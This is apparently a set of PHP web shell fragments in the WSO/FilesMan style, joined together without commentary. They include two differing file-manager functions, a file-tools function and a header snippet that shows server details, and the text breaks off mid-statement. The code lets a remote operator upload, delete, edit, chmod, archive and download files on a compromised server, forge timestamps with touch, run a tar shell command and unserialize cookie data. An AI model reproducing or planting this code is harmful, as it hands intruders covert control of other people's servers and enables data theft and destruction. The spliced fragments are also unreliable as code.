function actionFilesMan() { if (!empty($_COOKIE['f'])) { $_COOKIE['f'] = @unserialize($_COOKIE['f']); } if (!empty($_POST['p1'])) { switch ($_POST['p1']) { case 'uploadFile': if (is_array($_FILES['f']['tmp_name'])) { foreach ($_FILES['f']['tmp_name'] as $i => $tmpName) { if (!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { echo "Can't upload file!"; } } } break; case 'mkdir': if (!@mkdir($_POST['p2'])) { echo "Can't create new dir"; } break; case 'delete': function deleteDir($path) { $path = substr($path, -1) == '/' ? $path : $path . '/'; $dh = opendir($path); while (($▟ = readdir($dh)) !== false) { $▟ = $path . $▟; if (basename($▟) == ".." || basename($▟) == ".") { continue; } $type = filetype($▟); if ($type == "dir") { deleteDir($▟); } else { @unlink($▟); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { if ($f == '..') { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case 'paste': if ($_COOKIE['act'] == 'copy') { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE['f'] as $f) { copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']); } } elseif ($_COOKIE['act'] == 'move') { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE['f'] as $f) { @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f); } } elseif ($_COOKIE['act'] == 'zip') { if (class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach ($_COOKIE['f'] as $f) { if ($f == '..') { continue; } if (@is_file($_COOKIE['c'] . $f)) { $zip->addFile($_COOKIE['c'] . $f, $f); } elseif (@is_dir($_COOKIE['c'] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif ($_COOKIE['act'] == 'unzip') { if (class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach ($_COOKIE['f'] as $f) { if ($zip->open($_COOKIE['c'] . $f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif ($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if (!empty($_POST['p1'])) { prototype('act', $_POST['p1']); prototype('f', serialize(@$_POST['f'])); prototype('c', @$_POST['c']); } break; } } hardHeader(); echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; $dirContent = hardScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); if ($dirContent === false) { echo 'Can\'t open this folder!'; hardFooter(); return; } global $sort; $sort = array('name', 1); if (!empty($_POST['p1'])) { if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "<script>\n\tfunction sa() {\n\t\tfor(i=0;i<d.files.elements.length;i++)\n\t\t\tif(d.files.elements[i].type == 'checkbox')\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\n\t}\n</script>\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) { $files[] = array_merge($tmp, array('type' => 'file')); } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array('type' => 'dir')); } } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if ($GLOBALS['sort'][0] != 'size') { return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); } } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? viewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'frame\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>'; $l = $l ? 0 : 1; } echo "<tr id=fak><td colspan=7>\n\t<input type=hidden name=ne value=''>\n\t<input type=hidden name=a value='FilesMan'>\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\n\t<label><select name='p1'>"; if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) { echo "<option value='paste'>↳ Paste</option>"; } echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if (class_exists('ZipArchive')) { echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; } echo "<option value='tar'>+ tar.gz</option>"; echo "</select></label>"; if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) { echo " file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> "; } echo "<input type='submit' value='submit'></td></tr></form></table></div>"; hardFooter(); }
function actionFilesMan() { printHeader(); echo '<h1>File manager</h1><div class=content>'; if (isset($_POST['p1'])) { switch ($_POST['p1']) { case 'uploadFile': if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) { echo "Can't upload file!"; } break; break; case 'mkdir': if (!@mkdir($_POST['p2'])) { echo "Can't create new dir"; } break; case 'delete': function deleteDir($path) { $path = substr($path, -1) == '/' ? $path : $path . '/'; $dh = opendir($path); while (($item = readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == ".." || basename($item) == ".") { continue; } $type = filetype($item); if ($type == "dir") { deleteDir($item); } else { @unlink($item); } } closedir($dh); rmdir($path); } if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case 'paste': if ($_SESSION['act'] == 'copy') { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = opendir($c . $s); while (($f = readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_SESSION['f'] as $f) { copy_paste($_SESSION['cwd'], $f, $GLOBALS['cwd']); } } elseif ($_SESSION['act'] == 'move') { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = opendir($c . $s); while (($f = readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_SESSION['f'] as $f) { @rename($_SESSION['cwd'] . $f, $GLOBALS['cwd'] . $f); } } unset($_SESSION['f']); break; default: if (!empty($_POST['p1']) && ($_POST['p1'] == 'copy' || $_POST['p1'] == 'move')) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach ($_SESSION['f'] as $k => $f) { $_SESSION['f'][$k] = urldecode($f); } $_SESSION['cwd'] = @$_POST['c']; } break; } echo '<script>"";"";</script>'; } $dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); if ($dirContent === false) { echo 'Can\'t open this folder!'; return; } global $sort; $sort = array('name', 1); if (!empty($_POST['p1'])) { if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) { $sort = array($match[1], (int) $match[2]); } } ?> <script> function sa() { for(i=0;i<document.files.elements.length;i++) if(document.files.elements[i].type == 'checkbox') document.files.elements[i].checked = document.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post> <?php echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = $links = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) { $files[] = array_merge($tmp, array('type' => 'file')); } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $links[] = array_merge($tmp, array('type' => 'link')); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array('type' => 'dir')); } } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if ($GLOBALS['sort'][0] != 'size') { return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]]) * ($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); } } usort($files, "cmp"); usort($dirs, "cmp"); usort($links, "cmp"); $files = array_merge($dirs, $links, $files); $l = 0; foreach ($files as $f) { echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');"><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? viewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>'; $l = $l ? 0 : 1; } ?> <tr><td colspan=7> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='<?php echo htmlspecialchars($GLOBALS['cwd']); ?> '> <input type=hidden name=charset value='<?php echo isset($_POST['charset']) ? $_POST['charset'] : ''; ?> '> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if (!empty($_SESSION['act']) && @count($_SESSION['f'])) { ?> <option value='paste'>Paste</option><?php } ?> </select> <input type="submit" value=">>"></td></tr> </form></table></div> <?php printFooter(); }
function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if( @$_POST['p2']!='download' && @$_POST['p2'] != 'mkfile' ) { echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); $gid = @posix_getgrgid(@fileowner($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; } switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'download': if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: ".$type); } $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { } exit; break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>"";</script>'; else die('<script>g(null,null,null,null,"")</script>'); } echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { @file_put_contents($_POST['p1'],$_POST['p3']); echo 'Saved!<br><script>"";</script>'; } echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br><script>"";</script>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,null,null,;return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(@touch($_POST['p1'],$time,$time)) die('<script>g(null,null,null,null,"")</script>'); else { echo 'Fail!<script>"";</script>'; } } else echo 'Bad time format!<script>"";</script>'; } echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; case 'mkfile': if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) die('<script>g(null,null,null,"edit")</script>'); } echo 'Can\'t create!'; break; } echo '</div>'; }
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . '/'; $cwd_links .= "\")'>" . $path[$i] . "/</a>"; } } ?> <?php echo "Directory : " . $cwd . " <a href=" . $GLOBALS['home_cwd'] . ">[ home ]</a>"; ?> <?php echo $cwd_links . viewPermsColor($GLOBALS['cwd']); ?> <br>Filesystem Mounted: <?php echo "<span>Free</span> " . viewSize($freeSpace) . " of " . viewSize($totalSpace) . " (" . (int) ($freeSpace / $totalSpace * 100) . "%)"; ?> <br>ifconfig : <?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?> <a href="<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?> ">(Whois)</a> <br />Detected drives: <?php echo $drives; ?> <br /> Disabled Functions : <?php if ($disable_functions == "") {